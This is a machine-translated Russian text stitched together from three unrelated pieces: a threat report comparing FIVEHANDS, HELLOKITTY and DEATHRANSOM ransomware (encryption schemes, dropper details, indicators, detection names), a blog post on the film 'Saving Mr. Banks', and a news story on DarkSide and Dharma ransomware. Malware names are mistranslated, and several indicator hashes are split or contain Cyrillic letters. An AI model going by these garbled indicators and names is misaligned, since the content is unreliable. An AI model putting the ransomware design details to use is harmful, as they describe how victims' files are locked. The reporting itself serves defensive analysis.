    • Анализ FIVEHANDS выявил большое сходство со DEATHRANSOM, разделяя некоторые черты, функции и кодирование. В FIVEHANDS отсутствует языковая проверка, аналогичная HELLOKITTY
    • .
    • И DEATHRANSOM, и FIVEHANDS оставляют записку о выкупе во всех неисключенных каталогах
    Техническое сравнение FIVEHANDS, HELLOKITTY и DEATHRANSOM

    DEATHRANSOM написан на C, а два других семейства — на C++.DEATHRANSOM использует отдельные серии циклов do/while для перебора сетевых ресурсов, логических дисков и каталогов. Он также использует QueueUserWorkItem для реализации объединения потоков для своих потоков шифрования файлов.

    HELLOKITTY написан на C++, но переопределяет значительную часть функциональности DEATHRANSOM, используя аналогичные циклические операции и объединение потоков через QueueUserWorkItem. Структура кода для перечисления сетевых ресурсов, логических дисков и выполнения шифрования файлов очень похожа.Кроме того, HELLOKITTY и DEATHRANSOM используют очень похожие функции для проверки статуса завершения своих потоков шифрования перед выходом.

    FIVEHANDS написан на C++, и хотя высокоуровневая функциональность аналогична, вызовы функций и структура кода для реализации большинства функций написаны по-разному. Кроме того, вместо выполнения потоков с помощью QueueUserWorkItem FIVEHANDS использует IoCompletionPorts для более эффективного управления своими потоками шифрования. FIVEHANDS также использует больше функций стандартной библиотеки шаблонов C++ (STL), чем HELLOKITTY.

    Удаление теневых копий тома

    DEATHRANSOM, HELLOKITTY и FIVEHANDS используют один и тот же код для удаления теневых копий тома через WMI, выполняя запрос select * из Win32_ShadowCopy, а затем удаляя каждый экземпляр, возвращаемый его идентификатором.

    Операции шифрования

    Каждое из этих трех семейств вредоносных программ использует одинаковую схему шифрования. Асимметричный открытый ключ либо жестко запрограммирован, либо сгенерирован. Для каждого зашифрованного файла создается уникальный симметричный ключ.

    • После шифрования каждого файла асимметричный ключ зашифрует симметричный ключ и добавит его к зашифрованному файлу. Кроме того, к концу зашифрованного файла добавляется уникальное четырехбайтовое магическое значение. Вредоносная программа проверяет эти волшебные байты, чтобы убедиться, что ранее зашифрованный файл снова не зашифрован.
    • DEATHRANSOM и HELLOKITTY реализуют операции шифрования файлов, используя очень похожую структуру кода и поток.
    • FIVEHANDS реализует шифрование файлов с другой структурой кода и использует другие встроенные библиотеки шифрования.
    • В дополнение к симметричному ключу HELLOKITTY и FIVEHANDS также шифруют метаданные файла с помощью открытого ключа и добавляют его к зашифрованному файлу.
    • DEATHRANSOM генерирует пару ключей RSA, а HELLOKITTY и FIVEHANDS используют встроенный открытый ключ RSA или NTRU.
    СМЕРТЬ Шифрование
    • DEATHRANSOM создает пару открытого и закрытого ключей RSA-2048. Используя процедуру Диффи-Хеллмана на эллиптической кривой (ECDH), реализованную с помощью Curve25519, он вычисляет общий секрет, используя два входных значения: 1) 32 случайных байта из вызова RtlGenRandom и 2) жестко закодированное 32-байтовое значение (открытый ключ злоумышленника).Он также создает открытый ключ Curve25519. Общий секрет хэшируется SHA256 и используется в качестве ключа для шифрования Salsa20 открытого и закрытого ключей RSA.
    • Открытый ключ RSA используется для шифрования отдельных симметричных ключей, используемых для шифрования каждого файла. Версия зашифрованных ключей RSA в кодировке Base64 и открытый ключ Curve25519 жертвы включены в примечание о выкупе, предоставляя злоумышленникам информацию, необходимую для расшифровки файлов жертвы.
    • Для симметричного ключа DEATHRANSOM вызывает RtlGenRandom для генерации 32 случайных байтов.Это 32-байтовый ключ, используемый для шифрования AES каждого файла. После шифрования файла ключ AES шифруется открытым ключом RSA и добавляется к файлу.
    • DEATHRANSOM, наконец, добавляет четыре магических байта AB CD EF AB в конец зашифрованного файла и использует это в качестве проверки, чтобы гарантировать, что он не зашифрует уже зашифрованный файл.
    • Проанализированный образец DEATHRANSOM, используемый для сравнения, не меняет расширение файла.
    HELLOKITTY Шифрование
    • HELLOKITTY содержит встроенный открытый ключ RSA-2048.Этот открытый ключ хэшируется SHA256 и используется в качестве идентификатора жертвы в записке о выкупе. Этот открытый ключ RSA также используется для шифрования симметричного ключа каждого файла.
    • Для симметричного ключа HelloKitty создает 32-байтовое начальное значение на основе временной метки ЦП. Генерируется ключ Salsa20, который шифрует второе 32-байтовое начальное значение. Зашифрованный результат подвергается операции XOR с первым начальным числом, в результате чего для AES-шифрования каждого файла используется 32-байтовый ключ.
    • После шифрования каждого файла исходный размер файла, магическое значение DE C0 AD BA и ключ AES шифруются с помощью открытого ключа RSA и добавляются к файлу.HELLOKITTY и FIVEHANDS добавляют эти дополнительные метаданные к зашифрованному файлу, а DEATHRANSOM — нет.
    • Наконец, он добавляет четыре магических байта DA DC CC AB в конец зашифрованного файла.
    • В зависимости от версии HELLOKITTY может изменить или не изменить расширение файла.
    • Другие образцы HELLOKITTY использовали встроенный открытый ключ NTRU вместо RSA.
    Шифрование FIVEHANDS
    • FIVEHANDS использует встроенный открытый ключ NTRU.Этот ключ NTRU хэшируется SHA512, и первые 32 байта используются в качестве идентификатора жертвы в примечании о выкупе. Этот открытый ключ NTRU также используется для шифрования симметричного ключа каждого файла.
    • Для симметричного ключа FIVEHANDS использует встроенную процедуру генерации для создания 16 случайных байтов, используемых для ключа AES для шифрования каждого файла.
    • После шифрования каждого файла исходный размер файла, магическое значение DE C0 AD BA и ключ AES шифруются с помощью открытого ключа NTRU и добавляются к файлу.
    • Четыре магических байта DB DC CC AB добавляются в конец зашифрованного файла.
    • FIVEHANDS включает дополнительный код, отсутствующий в DEATHRANSOM и HELLOKITTY, для использования диспетчера перезагрузки Windows для закрытия используемого в данный момент файла, чтобы его можно было разблокировать и успешно зашифровать.
    • Расширение зашифрованного файла изменено на расширение .crypt
    • . Поток и последовательность шифрования
    • FIVEHANDS сильно отличается от двух других, отчасти потому, что он включает асинхронные запросы ввода-вывода и использует другие встроенные библиотеки шифрования.
    Зашифрованная дроппер FIVEHANDS

    Одним из существенных изменений между DEATHRANSOM и FIVEHANDS является использование дроппера только для памяти, который при выполнении ожидает ключ командной строки -key, за которым следует значение ключа, необходимое для выполнения расшифровки полезной нагрузки. Полезная нагрузка хранится и шифруется с помощью AES-128 с использованием IV «85471kaecaxaubv». Расшифрованная полезная нагрузка FIVEHANDS выполняется сразу после расшифровки. На сегодняшний день Mandiant наблюдала только зашифрованные дропперы с общим imhash 8517cf209c905e8012416

    f36a97.

    Аргументы командной строки

    FIVEHANDS может получить аргумент CLI для пути, это ограничивает действия программы-вымогателя по шифрованию файлов указанным каталогом. DEATHRANSOM и HELLOKITTY не принимают аргументы CLI.

    Проверка локали и мьютекса

    DEATHRANSOM выполняет проверку идентификатора языка и раскладки клавиатуры. Если любой из них соответствует русскому, казахскому, белорусскому, украинскому или татарскому языку, он выходит. Ни HELLOKITTY, ни FIVEHANDS не выполняют проверку идентификатора языка или клавиатуры.

    HELLOKITTY выполняет проверку мьютекса, в то время как два других не выполняют проверку мьютекса.

    Исключения файлов

    DEATHRANSOM и HELLOKITTY исключают одни и те же каталоги и файлы:

    programdata, $recycle.bin, файлы программ, окна, все пользователи, appdata, read_me.txt, autoexec.bat, desktop.ini, autorun.inf, ntuser.dat, iconcache.db, bootsect.bak, boot.ini, ntuser.dat.log или thumbs.db.

    Исключения для FIVEHANDS более обширны и содержат дополнительные файлы и каталоги, которые следует игнорировать.

    Дополнительные отличия
    • DEATHRANSOM устанавливает внешнее HTTPS-соединение для загрузки файла. Ни HELLOKITTY, ни FIVEHANDS не инициируют сетевые подключения.
    • HELLOKITTY содержит код для установки обоев жертвы на изображение, связанное с выкупом. В других образцах такой функции нет
    • Известно, что разные версии DEATHRANSOM и HELLOKITTY изменяют расширение файла
    • .
    • Известно, что различные версии HELLOKITTY проверяют завершение определенных процессов.

    Особенность

    ПЯТЬРУКИ

    ПРИВЕТ КИТТИ

    СМЕРТЬ РАСПРОДАЖА

    Язык программирования

    С++

    С++

    С

    Симметричное шифрование

    АЕС 128

    АЕС 256

    АЕС 256

    Асимметричное шифрование

    Встроенный ключ NTRU

    Встроенный ключ RSA или NTRU

    Curve25519 Создание ключей ECDH и RSA

    Исключения одинаковых каталогов и имен файлов

    Да

    Да

    Принимает аргументы CLI

    Да

    Сетевые подключения

    Да

    Проверка локали

    Да

    Проверка мьютекса

    Да

    К зашифрованным файлам добавлено

    байта

    ДБ DC CC AB

    DA DC CC AB

    AB CD EF AB

    Таблица 1: Сравнение функций программ-вымогателей

    Заключение

    Компания Mandiant наблюдала за программами-вымогателями SOMBRAT и FIVEHANDS одной и той же группой с января 2021 года.Хотя сходство между HELLOKITTY и FIVEHANDS заметно, программы-вымогатели могут использоваться разными группами через подпольные партнерские программы. Mandiant назначит кластер без категорий на основе множества факторов, включая инфраструктуру, используемую во время вторжений, и поэтому не все вторжения программ-вымогателей SOMBRAT или FIVEHANDS могли быть осуществлены UNC2447. WARPRISM и FOXGRABBER использовались в программах-вымогателях SUNCRYPT и DARKSIDE, демонстрируя дополнительную сложность и совместное использование между различными партнерскими программами программ-вымогателей.

    Индикаторы
    СОМБРАТ UNC2447
    • 87c78d62fd35bb25e34abb8f4caace4a
    • 6382d48fae675084d30ccb69b4664cbb (31dcd09eb9fa2050aadc0e6ca05957bf неразобранный)
    Пусковая установка СОМБРАТ
    • cf1b9284d239928cce1839ea8919a7af (ключ XOR wwansvc.a)
    • 4aa3eab3f657498f52757dc46b8d1f11 (wwansvc.c)
    • 1f6495ea7606a15daa79be159a8 (wwansvc.bat)
    • 31dcd09eb9fa2050aadc0e6ca05957bf (wwansvc.b)
    • edf567bd19d09b0bab4a8d068af15572 (wwansvc.б)
    • a5b26931a1519e9ceda04b4c997bb01f (wwansvc.txt)
    • f0751bef4804fadfe2b993bf25791c49 (4aa3eab3f657498f52757dc46b8d1f11 неразобранный)
    • 87c78d62fd35bb25e34abb8f4caace4a (edf567bd19d09b0bab4a8d068af15572 не разобранный)
    домены СОМБРАТ
    • Целомито[.]com (unc2447)
    • Feticost[.]com (unc2447)
    • Косарм[.]com
    • Порталкос[.]com
    ПЯТЬРУКИ
    • 39ea2394a6e6c39c5d7722dc996daf05
    • f568229e696c0e82abb35ec73d162d5e
    Зашифрованная дроппер FIVEHANDS
    • 6c849

      5f48d4b4aafce0fc49eb5b
    • 22d35005e926fe29379cb07b810a6075
    • 57824214710bc0cdb22463571a72afd0
    • 87c0b190e3b4ab9214e10a2d1c182153
    • 1b0b9e4cddcbcb02affe9c8124855e58
    • 46ecc24ef6d20f3eaf71ff37610d57d1
    • 1a79b6d169aac719c9323bc3ee4a8361
    • а64д79еба40229ае9ааеббд73938б985
    ПРИВЕТ КИТТИ
    • 136bd70f7aa98f52861879d7dca03cf2
    • 06ce6cd8bde756265f95fcf4eecadbe9
    • аф568е8а6060812ф040ф0кб0фд6ф5а7б
    • d96adf82f061b1a6c80699364a1e3208
    СМЕРТЬ РАСПРОДАЖА
    • c50ab1df254c185506ab892dc5c8e24b
    ВОРПРИЗА
    • c
    • 2c6d5175c30ba96388b07e9e16 (унк2447)
    • c171bcd34151cbcd48edbce13796e0ed
    • d87fcd8d2bf450b0056a151e9a116f72
    • f739977004981fbe4a54bc68be18ea79
    • e18b27f75c95b4d50bfcbcd00a5bd6c5
    • df6e6b3e53cc713276a03cce8361ae0f
    • 1cd03c0d00f7bfa7ca73f7d73677d8f8
    • 8071f66d64395911a7aa0d2057b9b00d
    • c12a96e9c50db5f8b0b3b5f9f3f134f0
    • e39184eacba2b05aaa529547abf41d2b
    • 09a05a2212bd2c0fe0e2881401fbff17
    • 8226d7615532f32eca8c04ac0d41a9fd
    • а01а2ба3ае9ф50а5аа8а5е34928
    • 29e53b32d5b4aae6d9a3b3c81648653c
    • а809068b052bc209d0ab13f6c5c8b4e7
    МАЯК UNC2447
    • 64.227.24[.]12 Профиль Havex Январь 2021
    • 157.230.184[.]142  chches_ Профиль APT10, ноябрь 2020 г. – январь 2021 г.
    • 74c688a22822b2ab8f18eafad2271cac
    • 7d6e57cbc112ebd3d3c95d3c73451a38
    FOXGRABBER
    • 4d3d3919dda002511e03310c49b7b47f
    Обнаружения FireEye

    Сетевая безопасность FireEye

    Защита электронной почты FireEye

    Обнаружение FireEye по требованию

    Анализ вредоносных программ FireEye

    Защита файла вредоносного ПО FireEye

     

    ПЯТЬРУКИ

    • FE_Loader_Win32_Generic_162
    • FE_Ransomware_Win32_FIVEHANDS_1
    • Вредоносное ПО.Двоичный файл.exe
    • Программы-вымогатели.Win.Generic.MVX

    СОМБРАТ

    • FE_Backdoor_Win64_SOMBRAT_1
    • Backdoor.Win.SOMBRAT
    • Malware.Binary.exe
    • Бэкдор.Win.SOMBRAT.MVX
    • FEC_Trojan_PS1_Generic_7
    • FEC_Trojan_PS1_Generic_8
    • FEC_Trojan_BAT_Generic_5

    ХЕЛЛОКИТИ

    • Программы-вымогатели.Win.Generic.MVX
    • Вредоносное ПО.Двоичный файл.exe
    • Программы-вымогатели.Win.HELLOKITTY.MVX
    • FE_Ransomware_Win_HELLOKITTY_1
    • FE_Ransomware_Win32_HELLOKITTY_1

    СМЕРТЬ

    • FE_Loader_Win32_Generic_92
    • Программы-вымогатели.Win.Generic.MVX
    • Malware.Binary.exe

    МАЯК

    • FE_Loader_Win32_BLUESPINE_1
    • Бэкдор.МАЯК
    • Malware.Binary.exe

    ВОРПРИЗА

    • FE_Loader_PS1_WARPRISM_1
    • FEC_Loader_PS1_WARPRISM_1
    • Бэкдор.МАЯК
    • Trojan.Generic
    • Trojan.Win.SYSTEMBC
    • Бэкдор. Meterpreter
    • Загрузчик.PS1.WARPRISM.MVX
    • Malware.Binary.exe
    • Malware.Binary.ps1

    ФОКСГРАББЕР

    • FE_Tool_MSIL_FOXGRABBER_1
    • FE_Trojan_MSIL_Generic_109

    Безопасность конечных точек FireEye

    В режиме реального времени (IOC)

    • СОМБРАТ (ЗАДНИЙ ДВЕРЬ)
    • ПОДОЗРИТЕЛЬНОЕ ЧТЕНИЕ ДАННЫХ BASE64 POWERSHELL (МЕТОДОЛОГИЯ)
    • FIVEHANDS RASOMWARE (СЕМЕЙНАЯ)
    • ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ДЛЯ ВЫМОГАТЕЛЯ DEATHRANSOM (СЕМЕЙНОЕ)
    • ПРОГРАММА ВЫМОГАТЕЛЯ HELLOKITTY (СЕМЕЙНАЯ)
    • МАЯК (СЕМЕЙНЫЙ)

    Защита от вредоносных программ (AV/MG)

    • СОМБРАТ
      • Общий.мг. 87c78d62fd35bb25
      • Общий.мг.6382d48fae675084
      • Trojan.GenericKD.45750384
      • Trojan.GenericKD.36367848
      • Универсальный.PwShell.RefA.CB5E962A
    • ПЯТЬРУКИ
      • Общий.мг.39ea2394a6e6c39c
      • Общий.мг.f568229e696c0e82
      • Общий.мг.6c849

        5f48d4
      • Общий.мг.22d35005e926fe29
      • Общий.мг.57824214710bc0cd
      • Общий.мг.87c0b190e3b4ab92
      • Общий.мг.1b0b9e4cddcbcb02
      • Общий.мг.46ecc24ef6d20f3e
      • Общий.мг.1a79b6d169aac719
      • Дженерик.мг.a64d79eba40229ae
      • Быт:Вариант.Зусы.375932
      • Быт:Вариант.Зусы.366866
      • Trojan.GenericKD.46059492
      • Trojan.GenericKD.46059131
      • Trojan.GenericKD.45996121
      • Trojan.GenericKD.45702783
    • ВОЕННЫЙ ПРИЗМ
      • Общий.мг.a01a2ba3ae9f50a5
      • Trojan.PowerShell.Agent.IJ
      • Trojan.Agent.EXDR
      • Trojan.PowerShell.Ransom.E
      • Trojan.Agent.EUKPTrojan.GenericKD.45856129
      • Heur.BZC.PZQ.Boxter.829.B5AEB7A6
      • Heur.BZC.PZQ.Boxter.829.B84D01A7
      • Heur.BZC.PZQ.Boxter.829.AE76D25C
      • Trojan.PowerShell.Ransom.F
      • Выпало:Heur.BZC.MNT.Boxter.826.0A2B3A87
      • Heur.BZC.ПЗК.Бокстер.829.А15701БД
    • СМЕРТЬ РАСПРОДАЖИ
      • Общий.mg.c50ab1df254c1855
      • Trojan.Ransomware.GenericKD.35760206
    • ПРИВЕТ КИТТИ
      • Общий.мг.136bd70f7aa98f52
      • Общий.mg.06ce6cd8bde75626
      • Общий.мг.af568e8a6060812f
      • Общий.мг.d96adf82f061b1a6
      • Generic.Malware.PfVPk!12.299C21F3
      • Быт:Вариант.Выкуп.HelloKitty.1
      • Generic.Malware.PfVPk!12.606CCA24
      • Generic.Malware.PfVPk!12.1454636C
    • МАЯК
      • Общий.mg.74c688a22822b2ab
      • Общий.mg.7d6e57cbc112ebd3
      • Trojan.Agent.DDSN
    MITRE ATT&CK

    Тактика

    Описание

    Начальный доступ

    Исполнение

    • T1047 Инструментарий управления Windows
    • Т1053.005 Запланированное задание/задание: Запланированное задание
    • T1059.001 Интерпретатор команд и сценариев: PowerShell
    • T1106 Выполнение через API

    Уклонение от защиты

    • Пакет программного обеспечения T1045
    • T1055 Технологический впрыск
    • T1140 Деобфускация/декодирование файлов или информации

    Дискавери

    • Реестр запросов T1012
    • T1046 Сканирование сетевых служб
    • T1057 Обнаружение процесса
    • T1082 Обнаружение системной информации
    • T1124 Обнаружение системного времени
    • Обнаружение общего сетевого ресурса T1135

    Коллекция

    • Т1560.003 Архивировать собранные данные: Архивировать с помощью пользовательского метода

    Воздействие

    • T1485 Уничтожение данных
    • Данные T1486 зашифрованы для удара
    • T1490 Блокировка восстановления системы

    Командование и управление

    • T1071.001 Протокол прикладного уровня: веб-протоколы
    • T1090.002 Прокси: Внешний прокси
    • T1572 Туннелирование протокола
    • Т1573.002 Зашифрованный канал: асимметричная криптография

    Эксфильтрация

    • T1041 Эксфильтрация через канал C2
    Благодарности

    Спасибо Нику Ричарду за технический обзор, Женевьеве Старк и Кимберли Гуди за аналитические материалы, а также Джону Эриксону, Джонатану Лепору и Стивену Экелсу за анализ, включенный в эту запись в блоге.

    Ветерок из Страны Чудес | Форум рассказчиков, фольклора и детской литературы Марии Татар


    Рецензия Энтони Лейна на «Спасение мистера»Бэнкс показывает, как именно фильму удается увлечь наше внимание:

    «Солнце вышло поздороваться с вами!» Говорит водитель Трэверс (Пол Джаматти), когда она прибывает в Лос-Анджелес. «Не будь нелепым», — отвечает она, и фильм оживляется этой вспыльчивостью и остроумием — теми же качествами, которые звучали в фантастической живости романов Поппинса. Точно так же, как Мэри спасла увядающую семью Бэнксов, Томпсон спасает фильм. Ложка ее лекарства снижает уровень сахара

     http://www.newyorker.com/arts/critics/ci…

    Помимо столкновения язвительного остроумия с жизнерадостным нравом, в фильме есть мощные конкурирующие аргументы о том, что «для вашего же блага», когда речь идет о развлечениях для детей. «Где гравитация?» — спрашивает Трэверс озадаченного Уолта Диснея, который стремится к духовному подъему с помощью веселых диалогов и оптимистичных мелодий. Ведь Мэри Поппинс , как представляют себе книгу сценаристы, родилась из потребности взрослого человека проработать детскую травму.Уолт и Памела оба страдали в детстве: Уолт подчинился воле эксплуататорского отца, который настаивает на том, чтобы его сыновья помогали в семейном бизнесе, доставляя газеты, независимо от того, насколько холодно или сколько времени это занимает, а Памела становится свидетелем алкоголика. болезненное погружение отца в дисфункцию, болезнь и смерть.

    Став взрослыми, эти двое по-разному подходят к созданию развлечений для детей, и их взгляды отражают раздвоение мнений в области детской литературы: с одной стороны протекционисты, а с другой — сторонники «все идет».Реальная жизнь довольно убогая, поучал родителей Руссо, и вы могли бы потакать молодежи. «Любите детство, — писал он в своем воспитательном трактате Эмиль , — поощряйте его игры, его удовольствия, его ласковый инстинкт». Это именно то, что сказал бы Уолт Дисней. Трэверс, напротив, придерживается мнения, что мы не должны приукрашивать, что мы не должны играть в «давай притворимся», а вместо этого учить детей суровым реалиям жизни. Мэри Поппинс точно не принадлежит к школе детской литературы «неопровержимых фактов», а развлечения Диснея, как мы знаем из всех этих лукавых злых фигур, одетых в пурпурное и черное (с оттенком золота), дают нам больше, чем полные ложки. сахара.Но Спасение мистера Бэнкса предлагает отличный небольшой урок о высоких ставках в писательской игре для детей, и он напоминает нам своим названием, как и везде в фильме, что искупление взрослых может быть настоящим Святым Граалем. искали авторы детских книг.

    А вот и Зои Хеллер в New York Times , 4 января 2013 г.:

    Новый фильм «Спасти мистера Бэнкса» рекламируется как история о том, как Уолт Дисней «творил свое волшебство», чтобы «оживить Мэри Поппинс».Этот слоган не просто оскорбляет автора, П. Л. Трэверса, который уже очень красиво воплотил Мэри Поппинс в жизнь без помощи Голливуда; это также оказывает медвежью услугу смелости Уолта Диснея как адаптера. Если есть что-то, чего Дисней явно не пытался сделать в фильме, так это «схватить» или изобразить раздражительную, непостоянную няню из низшего среднего класса из книг. Его несравненно более смелое решение состояло в том, чтобы убить эту Мэри Поппинс и заменить ее совершенно другим персонажем, сладкоголосым, несложно добродушным персонажем, которого сыграла Джули Эндрюс.

    Нам может казаться, что Поппинс Трэверса — более интересный и привлекательный персонаж, чем тот, которого изобрел Дисней, — так же, как мы можем судить о «Гэтсби» Ф. Скотта Фицджеральда как о лучшем произведении искусства, чем клубный ремикс Лурмана. Но это лишь говорит о том, что гений Лурмана и Диснея не был сравним с гением авторов, у которых они заимствовали. Из этого не следует, что Лурманн и Дисней могли бы сделать фильмы лучше, если бы относились к оригиналам с большим уважением.

    Большинство адаптаций не достигают величия (большинство фильмов не достигают, большинство произведений искусства не достигают), но те, которые достигают — «А теперь не смотри» Николаса Роуга, «Сад Финци-Контини» Витторио Де Сика, «Добрые сердца и короны» Роберта Хамера, «Леопард» Лукино Висконти, большая часть творчества Хичкока — не отличаются какой-то необычной степенью верности своим оригинальным текстам.И наоборот, некоторые из самых скучных адаптаций являются наиболее рабски «верными». (См. версию «Хоббита» Питера Джексона, фильм, увязший в компьютерной графике, и отчаянную решимость его режиссера не оскорблять поклонников Толкина.) Учитывая выбор между благоговением Джексона и наглостью Диснея, я думаю, что предпочел бы последнее. По крайней мере, «Мэри Поппинс» фильм дает нам несколько хороших песен .

    Дебютов DarkSide; Script-Kiddies Tap Dharma

    Управление непрерывностью бизнеса/аварийное восстановление , Киберпреступность , Борьба с мошенничеством и киберпреступность

    Криптоблокирующие вредоносные программы, используемые еще большим количеством типов вымогателей Мэтью Дж.Шварц ( евроинфосек) • 24 августа 2020 г. «Пресс-релиз» от DarkSide объявляет о своем дебюте (Источник: Malwrhunterteam)

    Банды, владеющие программами-вымогателями, продолжают набирать новых жертв и получать рекордные доходы. Это побуждает новых игроков всех размеров и опыта — новичков, преступников, уже имеющих опыт работы с экосистемой программ-вымогателей, и более продвинутых злоумышленников — попробовать свои силы в борьбе с вредоносными программами, блокирующими шифрование, и рэкетом для кражи данных.

    См. также: Живой вебинар | Как остановить четырех всадников апокалипсиса с потерей данных

    Для преступников привлекательность программ-вымогателей очевидна: использование вредоносного ПО с криптографической блокировкой для вымогательства у организаций продолжает приносить все большие дивиденды — в среднем сейчас почти 180 000 долларов, по данным компании Coveware, занимающейся реагированием на инциденты с программами-вымогателями, на основании случаев, которые она расследовала. с апреля по июнь. Средняя сумма увеличилась на 60 % по сравнению с первым кварталом года (см.: День выплаты жалованья программ-вымогателей: средний размер выплат вырос до 178 000 долларов США ).

    Очевидно, что количество программ-вымогателей растет, несмотря на продолжающийся экономический хаос, вызванный пандемией COVID-19. В значительной степени, конечно, это потому, что некоторые жертвы платят своим злоумышленникам за обещание ключа дешифрования, за удаление своего имени — и, возможно, украденных данных — с сайта «имя и позор», за обещание злоумышленников удалить украденные данные или, возможно, все вышеперечисленное.

    В четверг Университет штата Юта сообщил, что в июле он был атакован неустановленным штаммом программы-вымогателя, который зашифровал «информацию о сотрудниках и студентах», после чего заплатил злоумышленникам выкуп в размере 457 000 долларов, частично покрываемый его полисом киберстрахования, в обмен на не публикуя данные.

    Другие примеры: Blackbaud, которая создает программное обеспечение для маркетинга, сбора средств и управления взаимоотношениями с клиентами, в прошлом месяце заявила, что «недавно остановила» атаку программы-вымогателя, заплатив злоумышленникам. Компания Garmin, производящая фитнес-трекеры и навигационные устройства, также, как сообщается, заплатила нераскрытую сумму выкупа злоумышленникам, которые успешно зашифровали ее системы с помощью WastedLocker.

    Постоянно растущий список жертв

    Конечно, не каждая атака программ-вымогателей приводит к тому, что жертвы платят.Но многие злоумышленники, похоже, играют на цифрах. Пытаясь назвать и пристыдить жертв, которые не заплатили, особенно если это известные имена, банды также зарабатывают на бесплатном маркетинге своих операций, потенциально создавая шумиху, которая может убедить будущих жертв заплатить им быстро, чтобы они ушли.

    Список жертв программ-вымогателей пополняется. Недавние жертвы включают Brown-Forman, производителя алкогольных напитков из Луисвилля, штат Кентукки, в том числе Jack Daniels, который недавно пострадал от Sodinokibi, также известного как REvil, который утверждал, что украл 1 ТБ данных, включая конфиденциальные записи сотрудников.Браун-Форман пообещал не платить выкуп.

    Операция Sodinokibi по вымогательству как услуга также указала на своем специальном сайте «Happy Blog» для утечки данных юридическую фирму GSMLaw в качестве жертвы, а также новых жертв в страховом, консалтинговом и нефтегазовом секторах. Sodinokibi — одна из нескольких операций, которые крадут данные до систем криптоблокировки, а затем угрожают утечкой или аукционом украденных данных, если жертвы не заплатят (см.: Avaddon Ransomware присоединяется к клубу утечки данных ).

    Тем временем Carnival, крупнейшая в мире круизная компания, 15 августа пережила вторую в этом году вспышку программ-вымогателей и предупредила в отчете по ценным бумагам и биржам США, что данные клиентов и сотрудников, вероятно, были украдены.

    Другие недавние жертвы программ-вымогателей включают Boyce Technologies, которая строит системы транзитной связи, а в последнее время также и вентиляторы, и пострадала от банды DoppelPaymer, и Canon USA, которая пострадала от банды Maze.

    Дебют DarkSide

    Привлеченные потенциальной прибылью, на сцену продолжают прибывать новые игроки. В прошлом месяце «Лаборатория Касперского» предупредила, что северокорейская хакерская группа Lazarus Group теперь, похоже, расширилась до программ-вымогателей, которые она удаляет после использования вредоносных программ, чтобы закрепиться в сети и украсть учетные данные Active Directory.

    Записка о выкупе DarkSide (Источник: Bleeping Computer)

    Ранее в этом месяце появилась еще одна новая операция по вымогательству под названием DarkSide, хотя она утверждала, что ее участники не новички.«Мы новый продукт на рынке, но это не значит, что у нас нет опыта и мы пришли из ниоткуда», — заявила группа в сообщении на хакерском форуме, опубликованном исследователями безопасности Malwrhunterteam. «Мы получили миллионы долларов прибыли, сотрудничая с другими известными криптолокаторами».

    В «пресс-релизе», объявляющем о своем прибытии, банда говорит, что она нацелена только на организации, «которые могут заплатить требуемую сумму». Он добавляет: «Мы не хотим убивать ваш бизнес.»

    Bleeping Computer сообщает, что операция потребовала выкупа в размере от 200 000 до 2 миллионов долларов.

    Эксперты по безопасности

    говорят, что между DarkSide и REvil есть некоторое сходство, хотя нет никаких неопровержимых доказательств того, что DarkSide — это отколовшаяся операция. Например, записка о выкупе DarkSide очень похожа на REvil, но такой текст легко вырезать и вставлять. Bleeping Computer также сообщает, что DarkSide использует закодированный сценарий PowerShell, который идентичен REvil, но, опять же, его можно скопировать.

    Программа-вымогатель DarkSide также имеет код для проверки для стран СНГ…
    Какая неожиданность, правда?

    Что интересно, он использует и GetSystemDefaultUILanguage, и GetUserDefaultLangID, что очень редко встречается в RW. Только сделано GandCrab, а затем REvil, прежде чем я думаю…
    @VK_Intel pic.twitter.com/p0Ut60vMHV

    — MalwareHunterTeam (@malwrhunterteam) 11 августа 2020 г. ни в одном из государств-членов постсоветского Содружества Независимых Государств.В состав СНГ входят Россия, а также Азербайджан, Армения, Беларусь, Грузия, Казахстан, Кыргызстан, Молдова, Таджикистан, Туркменистан, Узбекистан и Украина (см.: Напоминание о правилах киберпреступности в России: Никогда не взламывайте россиян ).

    ‘Дети с иранскими сценариями’ владеют Дхармой

    Однако некоторые злоумышленники, использующие программы-вымогатели, кажутся новичками на хакерской сцене во всех смыслах.

    Например, относительно новым явлением является то, что группа говорящих на персидском языке хакеров, действующих из Ирана, использует программу-вымогатель Dharma для финансово мотивированных атак на цели в Китае, Индии, Японии и России, сообщает фирма по кибербезопасности Group- ИБ.

    Dharma, также известная как CrySis, впервые появилась как программа-вымогатель как услуга в 2016 году и по-прежнему «нацелена на киберпреступников начального уровня, а также предлагает подход, основанный на цифрах, для проникновения в сети жертв и запуск атак программ-вымогателей», — говорит Шон Галлахер, старший исследователь угроз в Sophos, в недавнем исследовательском отчете (см.: How Dharma Ransomware-as-a-Service Model Works ).

    С момента дебюта в обращении находилось несколько вариантов Дхармы.В марте исходный код одного из таких вариантов появился в продаже в Интернете за 2000 долларов на российском форуме по киберпреступности, сообщает Sophos.

    Публикация на российском форуме по киберпреступности в марте 2020 года с рекламой исходного кода Dharma за 2000 долларов (Источник: Sophos)

    . В то время как Dharma ранее была привязана к относительно низким требованиям выкупа, в последние месяцы Coveware сообщает, что начала получать шестизначные выкупы, требуемые Нападающие, владеющие Дхармой.

    «Тот факт, что исходный код Dharma стал широко доступным, привел к увеличению числа операторов, внедряющих его», — говорит Олег Скулкин, старший аналитик по цифровой криминалистике и реагированию на инциденты в Group-IB.«Но удивительно, что Дхарма попала в руки иранских сценаристов, которые использовали ее для получения финансовой выгоды, поскольку Иран традиционно был страной спонсируемых государством злоумышленников, занимающихся шпионажем и саботажем».

    Нет СамСам

    Конечно, это не первый случай, когда иранцев связывают с использованием программ-вымогателей. В 2018 году Министерство юстиции США обвинило двух иранцев в использовании программы-вымогателя SamSam для атаки на более чем 200 организаций и организаций, включая Атланту и другие муниципалитеты, а также в сборе выкупа на 6 миллионов долларов и причинении жертвам ущерба на сумму более 30 миллионов долларов.

    «Атаки программы-вымогателя SamSam действительно были редким примером финансово мотивированных преступлений на иранской киберпреступной сцене», — сказал Скулкин в интервью Information Security Media Group. «Однако нельзя исключать, что их возможности могли быть использованы в проправительственных шпионских кампаниях из-за большого радиуса действия их атак».

